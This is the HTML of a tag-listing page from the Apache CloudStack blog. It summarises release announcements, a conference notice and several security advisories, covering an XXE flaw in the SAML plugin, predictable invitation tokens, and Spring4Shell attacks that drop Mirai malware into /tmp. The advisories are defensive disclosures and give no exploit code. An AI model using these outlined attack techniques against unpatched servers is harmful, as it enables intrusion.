| <!doctype html> |
| <html lang="en" dir="ltr" class="blog-wrapper blog-tags-post-list-page plugin-blog plugin-id-default" data-has-hydrated="false"> |
| <head> |
| <meta charset="UTF-8"> |
| <meta name="generator" content="Docusaurus v2.4.3"> |
| <title data-rh="true">57 posts tagged with "announcement" | Apache CloudStack</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://cloudstack.apache.org/blog/tags/announcement/page/2"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" property="og:title" content="57 posts tagged with "announcement" | Apache CloudStack"><meta data-rh="true" name="docusaurus_tag" content="blog_tags_posts"><meta data-rh="true" name="docsearch:docusaurus_tag" content="blog_tags_posts"><link data-rh="true" rel="icon" href="/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://cloudstack.apache.org/blog/tags/announcement/page/2"><link data-rh="true" rel="alternate" href="https://cloudstack.apache.org/blog/tags/announcement/page/2" hreflang="en"><link data-rh="true" rel="alternate" href="https://cloudstack.apache.org/blog/tags/announcement/page/2" hreflang="x-default"><link rel="alternate" type="application/rss+xml" href="/blog/rss.xml" title="Apache CloudStack RSS Feed"> |
| <link rel="alternate" type="application/atom+xml" href="/blog/atom.xml" title="Apache CloudStack Atom Feed"> |
| |
| |
| |
| |
| |
| |
| <script src="scripts/bootstrap.bundle.min.js" async></script><link rel="stylesheet" href="/assets/css/styles.e12efb83.css"> |
| <link rel="preload" href="/assets/js/runtime~main.60ecdf28.js" as="script"> |
| <link rel="preload" href="/assets/js/main.2d60fa8d.js" as="script"> |
| </head> |
| <body class="navigation-with-keyboard"> |
| <script>!function(){function t(t){document.documentElement.setAttribute("data-theme",t)}var e=function(){var t=null;try{t=new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}return t}()||function(){var t=null;try{t=localStorage.getItem("theme")}catch(t){}return t}();t(null!==e?e:"light")}()</script><div id="__docusaurus"> |
| <div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="navbar navbar--fixed-top"><div class="navbar__inner"><div class="navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><div class="navbar__logo"><img src="/img/navlogo.png" alt="apache-cloudstack" class="themedImage_ToTc themedImage--light_HNdA"><img src="/img/navlogo.png" alt="apache-cloudstack" class="themedImage_ToTc themedImage--dark_i4oU"></div><b class="navbar__title text--truncate"></b></a></div><div class="navbar__items navbar__items--right"><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">About</a><ul class="dropdown__menu"><li><a class="dropdown__link" href="/about">About</a></li><li><a class="dropdown__link" href="/history">History</a></li><li><a class="dropdown__link" href="/features">Features</a></li><li><a class="dropdown__link" href="/who">Who We Are</a></li><li><a class="dropdown__link" href="/bylaws">Community Bylaws</a></li><li><a class="dropdown__link" href="/trademark-guidelines">Trademark Guidelines</a></li><li><a class="dropdown__link" href="/security">Security</a></li></ul></div><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">Community</a><ul class="dropdown__menu"><li><a class="dropdown__link" href="/contribute">Get Involved</a></li><li><a class="dropdown__link" href="/developers">Developer Resources</a></li><li><a class="dropdown__link" href="/mailing-lists">Join Mailing Lists</a></li><li><a href="https://github.com/apache/cloudstack/issues" target="_blank" rel="noopener noreferrer" class="dropdown__link">Issues Tracker<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://join.slack.com/t/apachecloudstack/shared_invite/zt-1u8qwbivp-u16HRI~LWioLmF1G2D3Iyg" target="_blank" rel="noopener noreferrer" class="dropdown__link">Community Slack<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a class="dropdown__link" href="/events">Events and Meetups</a></li><li><a href="https://www.cloudstackcollab.org/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Collab Conference<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">Use Cases</a><ul class="dropdown__menu"><li><a class="dropdown__link" href="/cloud-builders">Cloud Builders</a></li><li><a class="dropdown__link" href="/kubernetes">Kubernetes</a></li><li><a class="dropdown__link" href="/integrations">Integrations</a></li></ul></div><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">Users</a><ul class="dropdown__menu"><li><a class="dropdown__link" href="/users">Known Users</a></li><li><a class="dropdown__link" href="/blog/tags/announcement/page/blog/tags/case-studies">Case Studies</a></li><li><a href="https://docs.google.com/forms/d/e/1FAIpQLScPHIRetdt-pxPT62IesXMoQUmhQ8ATGKcYZa507mB9uwzn-Q/viewform" target="_blank" rel="noopener noreferrer" class="dropdown__link">Take Survey<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li></ul></div><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">Documentation</a><ul class="dropdown__menu"><li><a href="https://docs.cloudstack.apache.org" target="_blank" rel="noopener noreferrer" class="dropdown__link">CloudStack Documentation<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://cwiki.apache.org/confluence/display/CLOUDSTACK/Home" target="_blank" rel="noopener noreferrer" class="dropdown__link">Project Wiki<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a href="https://cwiki.apache.org/confluence/display/CLOUDSTACK/CloudStack+Books" target="_blank" rel="noopener noreferrer" class="dropdown__link">CloudStack Books<svg width="12" height="12" aria-hidden="true" viewBox="0 0 24 24" class="iconExternalLink_nPIU"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"></path></svg></a></li><li><a class="dropdown__link" href="/api/">API Documentation</a></li></ul></div><a class="navbar__item navbar__link" href="/downloads">Download</a><a class="navbar__item navbar__link" href="/blog">Blog</a><a href="https://github.com/apache/cloudstack" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link header-github-link" aria-label="GitHub repository"></a><div class="searchBox_ZlJk"><div class="navbar__search searchBarContainer_NW3z"><input placeholder="Search" aria-label="Search" class="navbar__search-input"><div class="loadingRing_RJI3 searchBarLoadingRing_YnHq"><div></div><div></div><div></div><div></div></div><div class="searchHintContainer_Pkmr"><kbd class="searchHint_iIMx">ctrl</kbd><kbd class="searchHint_iIMx">K</kbd></div></div></div><div class="navbar__item dropdown dropdown--hoverable dropdown--right"><a href="#" aria-haspopup="true" aria-expanded="false" role="button" class="navbar__link">ASF</a><ul class="dropdown__menu"><li><a href="https://www.apache.org/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Foundation</a></li><li><a href="https://www.apache.org/licenses/" target="_blank" rel="noopener noreferrer" class="dropdown__link">License</a></li><li><a href="https://www.apache.org/events/current-event" target="_blank" rel="noopener noreferrer" class="dropdown__link">Events</a></li><li><a href="https://www.apache.org/security/" target="_blank" rel="noopener noreferrer" class="dropdown__link">Security</a></li><li><a href="https://www.apache.org/foundation/sponsorship.html" target="_blank" rel="noopener noreferrer" class="dropdown__link">Sponsorship</a></li><li><a href="https://www.apache.org/foundation/policies/privacy.html" target="_blank" rel="noopener noreferrer" class="dropdown__link">Privacy</a></li><li><a href="https://www.apache.org/foundation/thanks.html" target="_blank" rel="noopener noreferrer" class="dropdown__link">Thanks</a></li></ul></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="main-wrapper mainWrapper_z2l0"><div class="container margin-vert--lg blog-container"><div class="row"><aside class="col col--3"><nav class="sidebar thin-scrollbar"><div class="sidebarItemTitle margin-bottom--md">CloudStack Blog</div><ul class="sidebarItemList clean-list"><li class="sidebarItem"><a class="sidebarItemLink" href="/blog">All Posts</a></li><li class="sidebarItem"><a class="sidebarItemLink" href="/blog/tags/news">News</a></li><li class="sidebarItem"><a aria-current="page" class="sidebarItemLink sidebarItemLinkActive" href="/blog/tags/announcement">Announcements</a></li><li class="sidebarItem"><a class="sidebarItemLink" href="/blog/tags/roundup">Past Events</a></li><li class="sidebarItem"><a class="sidebarItemLink" href="/blog/tags/case-studies">Case Studies & Integrations</a></li><li class="sidebarItem"><a class="sidebarItemLink" href="/blog/tags/community">Meet the Community</a></li></ul></nav></aside><main class="col col--7" itemscope="" itemtype="http://schema.org/Blog"><header class="margin-bottom--xl"><h1>57 posts tagged with "announcement"</h1><a href="/blog/tags">View All Tags</a></header><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default and the attacker would require that this plugin be enabled to exploit the vulnerability. When the SAML 2.0 plugin is enabled in affected versions of Apache CloudStack could potentially allow the exploitation of XXE vulnerabilities. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, server-side request forgery (SSRF) on the CloudStack management server."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/cve-2022-35741">[ADVISORY] Apache CloudStack SAML Single Sign-On XXE (CVE-2022-35741)</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-07-18T00:00:00.000Z" itemprop="datePublished">July 18, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/rohityadavcloud" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/rohityadavcloud.png" alt="Rohit Yadav" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/rohityadavcloud" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Rohit Yadav</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><a href="/blog/cve-2022-35741"><img loading="lazy" src="/img/imported/dc6a0532-c5b5-4ed0-b2f8-f40197d2d577" alt="Screenshot 2022-07-18 at 15.33.00.png" width="750" height="393" class="img_ev3q"></a><p>Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default and the attacker would require that this plugin be enabled to exploit the vulnerability. When the SAML 2.0 plugin is enabled in affected versions of Apache CloudStack could potentially allow the exploitation of XXE vulnerabilities. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, server-side request forgery (SSRF) on the CloudStack management server.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about [ADVISORY] Apache CloudStack SAML Single Sign-On XXE (CVE-2022-35741)" href="/blog/cve-2022-35741"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="On 14th June 2022, a new issue affecting only KVM users using Shared Mount Point storage was reported [1]. This issue affects the creation and the usage of existing Shared Mount Point storage pools on Apache CloudStack 4.17.0.0."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/advisory-apache-cloudstack-advisory-on">[ADVISORY] Apache CloudStack Advisory on KVM Shared Mount Point issues on version 4.17.0.0</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-06-17T00:00:00.000Z" itemprop="datePublished">June 17, 2022</time></div></header><div class="markdown" itemprop="articleBody"><p>On 14th June 2022, a new issue affecting only KVM users using Shared Mount Point storage was reported [1]. This issue affects the creation and the usage of existing Shared Mount Point storage pools on Apache CloudStack 4.17.0.0.<br></p><p>Apache CloudStack 4.17.0.0 added support for the StorPool storage based on Shared Mount Point. However, the current version of CloudStack doesn<!-- -->'<!-- -->t allow multiple implementations of Shared Mount Point storage pool providers, causing the StorPool provider to override the default implementation. This affected the other storage pool providers for Shared Mount Point since CloudStack tries to add them as a StorPool storage pool.<br></p><p>To mitigate the issue, a CloudStack administrator needs to do the following on version 4.17.0.0:<br></p><ul><li>On each management server: stop the CloudStack management service, remove the Storpool plugin jar on /usr/share/cloudstack-management/lib/cloud-plugin-storage-volume-storpool-4.17.0.0.jar and restart the CloudStack management service<br></li><li>On each KVM host: stop the CloudStack agent service, remove the StorPool plugin jar on /usr/share/cloudstack-agent/lib/cloud-plugin-storage-volume-storpool-4.17.0.0.jar and restart the CloudStack agent service<br></li></ul><p>Note: This workaround removes the StorPool plugin support. StorPool users should not apply the workaround to continue using their Storpool storage.<br></p><p>This issue will be fixed in the upcoming CloudStack version 4.17.1.0.<br></p><p>[1]<!-- --> <a href="https://github.com/apache/cloudstack/issues/6455" target="_blank" rel="noopener noreferrer" title="https://github.com/apache/cloudstack/issues/6455"><a href="https://github.com/apache/cloudstack/issues/6455" target="_blank" rel="noopener noreferrer">https://github.com/apache/cloudstack/issues/6455</a></a></p><p></p></div><footer class="row docusaurus-mt-lg"><div class="col"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="The Apache Software Foundation Announces Apache&reg; CloudStack&reg; v4.17"><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/apache-cloudstack-4-17-release">Apache CloudStack 4.17.0.0 LTS Release</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-06-07T00:00:00.000Z" itemprop="datePublished">June 7, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/IvetPM.png" alt="Ivet Petrova" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Ivet Petrova</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><p><em>The Apache Software Foundation Announces Apache<strong>®</strong> CloudStack<strong>®</strong> v4.17</em><br></p><p>Apache CloudStack 4.17.0.0 is a 4.17 LTS release with 383 new features, improvements and bug fixes since 4.16, including 16 major new features. Some of the highlights include:</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about Apache CloudStack 4.17.0.0 LTS Release" href="/blog/apache-cloudstack-4-17-release"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="Apache CloudStack 4.17 is the latest release of the cloud management platform from the Apache Software Foundation and is a result of months of work from the development community. Apache CloudStack 4.17 is an LTS (Long Term Support) release so will be maintained for a period of 18 months after release."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/what-s-new-in-apache1">What's New in Apache CloudStack 4.17</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-06-07T00:00:00.000Z" itemprop="datePublished">June 7, 2022</time></div></header><div class="markdown" itemprop="articleBody"><p>Apache CloudStack 4.17 is the latest release of the cloud management platform from the Apache Software Foundation and is a result of months of work from the development community. Apache CloudStack 4.17 is an LTS (Long Term Support) release so will be maintained for a period of 18 months after release.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about What's New in Apache CloudStack 4.17" href="/blog/what-s-new-in-apache1"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="For the 10th consecutive year, the Apache CloudStack community is organising its major event - CloudStack Collaboration Conference, running from 14th to 16th November 2022. The event will be a hybrid event, giving attendees and speakers the option to join in Sofia, Bulgaria (Exact location TBD) or remotely from their computers. By doing so, the conference will allow more people from the Apache CloudStack community and people interested in the technology, to learn more about it and its latest capabilities and integrations."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/cloudstack-collaboration-conference-2022-november">CloudStack Collaboration Conference 2022 - November 14-16</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-05-26T00:00:00.000Z" itemprop="datePublished">May 26, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/IvetPM.png" alt="Ivet Petrova" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Ivet Petrova</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><a href="/blog/cloudstack-collaboration-conference-2022-november"><img loading="lazy" src="/img/imported/c8eec338-5d20-4e46-80d3-376294e441f0" alt="Screenshot 2022-05-26 at 15.49.12.png" width="750" height="393" class="img_ev3q"></a><p>For the 10<sup>th</sup> consecutive year, the Apache CloudStack community is organising its major event - CloudStack Collaboration Conference, running from 14<sup>th</sup> to 16<sup>th</sup> November 2022. The event will be a hybrid event, giving attendees and speakers the option to join in Sofia, Bulgaria (Exact location TBD) or remotely from their computers. By doing so, the conference will allow more people from the Apache CloudStack community and people interested in the technology, to learn more about it and its latest capabilities and integrations.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about CloudStack Collaboration Conference 2022 - November 14-16" href="/blog/cloudstack-collaboration-conference-2022-november"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="At the beginning of April 2022, vulnerabilities in the Spring Framework for Java were publicly revealed. Many companies noticed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965. This vulnerability allows hackers to execute the Mirai botnet malware. The exploit allows threat actors to download the Mirai sample to the /tmp folder and execute them after changing its execute permission using chmod."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/cloudstack-advisory-on-spring4shell-cve">CloudStack Advisory on Spring4Shell (CVE-2022-22965&nbsp;and&nbsp;CVE-2022-22963)</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-04-14T00:00:00.000Z" itemprop="datePublished">April 14, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/IvetPM.png" alt="Ivet Petrova" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Ivet Petrova</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><p>At the beginning of April 2022, vulnerabilities in the Spring Framework for Java were publicly revealed. Many companies noticed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965. This vulnerability allows hackers to execute the Mirai botnet malware. The exploit allows threat actors to download the Mirai sample to the <code>/tmp</code> folder and execute them after changing its execute permission using <code>chmod</code>.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about CloudStack Advisory on Spring4Shell (CVE-2022-22965&nbsp;and&nbsp;CVE-2022-22963)" href="/blog/cloudstack-advisory-on-spring4shell-cve"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/cloudstack-advisory-on-insecure-project">CloudStack Advisory on Insecure Project Invitation Token (CVE-2022-26779)</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-03-16T00:00:00.000Z" itemprop="datePublished">March 16, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/DaanHoogland" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/DaanHoogland.png" alt="Daan Hoogland" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/DaanHoogland" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Daan Hoogland</span></a></div><small class="avatar__subtitle" itemprop="description">Apache Foundation Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><p>Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about CloudStack Advisory on Insecure Project Invitation Token (CVE-2022-26779)" href="/blog/cloudstack-advisory-on-insecure-project"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="The Apache CloudStack project is pleased to announce the release of CloudStack 4.16.1.0."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/apache-cloudstack-lts-maintenance-release3">Apache CloudStack LTS Maintenance Release 4.16.1.0</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-03-07T00:00:00.000Z" itemprop="datePublished">March 7, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/IvetPM.png" alt="Ivet Petrova" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Ivet Petrova</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><a href="/blog/apache-cloudstack-lts-maintenance-release3"><img loading="lazy" src="/img/imported/24029aa4-71d0-42df-880d-a6eb10610b80" alt="cs-4161.jpg" width="750" height="393" class="img_ev3q"></a><p>The Apache CloudStack project is pleased to announce the release of CloudStack 4.16.1.0. |
| The CloudStack 4.16.1.0 release is a maintenance release as part of its 4.16.x LTS branch and contains more than 150 fixes and improvements since the CloudStack 4.16.0.0 release. Some of the highlights include:</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about Apache CloudStack LTS Maintenance Release 4.16.1.0" href="/blog/apache-cloudstack-lts-maintenance-release3"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services."><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/apache-cloudstack-terraform-provider-v0">Apache CloudStack Terraform Provider v0.4.0 Release</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2022-02-07T00:00:00.000Z" itemprop="datePublished">February 7, 2022</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/IvetPM.png" alt="Ivet Petrova" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/IvetPM" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Ivet Petrova</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><a href="/blog/apache-cloudstack-terraform-provider-v0"><img loading="lazy" src="/img/imported/02633cc4-0d22-4bde-966e-4e3efec8f357" alt="cloudstack-terraform.jpg" width="750" height="393" class="img_ev3q"></a><p>Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about Apache CloudStack Terraform Provider v0.4.0 Release" href="/blog/apache-cloudstack-terraform-provider-v0"><b>Read More</b></a></div></footer></article><article class="margin-bottom--xl" itemprop="blogPost" itemscope="" itemtype="http://schema.org/BlogPosting"><meta itemprop="description" content="On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported. It is by now tracked under CVE-2021-44228:"><header><h2 class="title_f1Hy" itemprop="headline"><a itemprop="url" href="/blog/log4jshell">CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)</a></h2><div class="container_mt6G margin-vert--md"><time datetime="2021-12-13T00:00:00.000Z" 